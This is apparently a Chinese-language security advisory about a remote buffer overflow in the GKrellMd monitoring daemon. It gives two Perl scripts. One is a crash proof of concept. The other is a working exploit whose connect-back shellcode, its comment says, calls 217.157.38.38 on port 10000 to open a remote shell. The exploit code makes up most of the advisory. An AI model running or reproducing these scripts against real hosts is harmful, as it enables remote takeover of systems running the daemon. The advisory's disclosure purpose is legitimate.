Gkrellmd远程缓冲区溢出漏洞发布时间:2003-06-25 更新时间:2003-06-25 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8022 受影响系统 GKrellM GKrellM 2.1.13详细描述 GKrellMd是一个系统性能监视程序。GKrellMd在处理网络数据包时由于没有对数据做充分的边界检查会导致缓冲区溢出漏洞,远程攻击者可能利用此漏洞在运行了GKrellMd的主机上执行任意指令。据说此漏洞影响Gkrellm 2.1.13。 测试代码 #!/usr/bin/perl -s use IO::Socket; # # proof of concept code # tested: grkellmd 2.1.10 # if(!$ARGV[0] || !$ARGV[1]) { print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); } $host = $ARGV[0]; $port = $ARGV[1]; $exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $socket = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "unable to connect to $host:$port ($!)\n" unless $socket; print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have sleep(1); print $socket $exploitstring; close($socket); #!/usr/bin/perl -s # kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE # advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd # I just ripped their code and made it do something useful instead # shellcode by bighawk(i think) - wow this is badly formatted. use IO::Socket; if(!$ARGV[0] || !$ARGV[1]) { print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); } $host = $ARGV[0]; $port = $ARGV[1]; $ret = pack("l",0xbfbffa60); $shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; #--> connect-back to a useless ip, change it:) ^^217.157.38.38^ ^^10000^ $nop = "\x90"; $buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode; $socket = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "unable to connect to $host:$port ($!)\n" unless $socket; print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have sleep(1); #might have to adjust this on slow connections print $socket $buf; close($socket); 解决方案 厂商还未提供解决方案。 相关信息 Gkrellmd 2.1.10 remote exploit (buffer overflow) http://packetstormsecurity.nl/0306-exploits/gkrellmd |
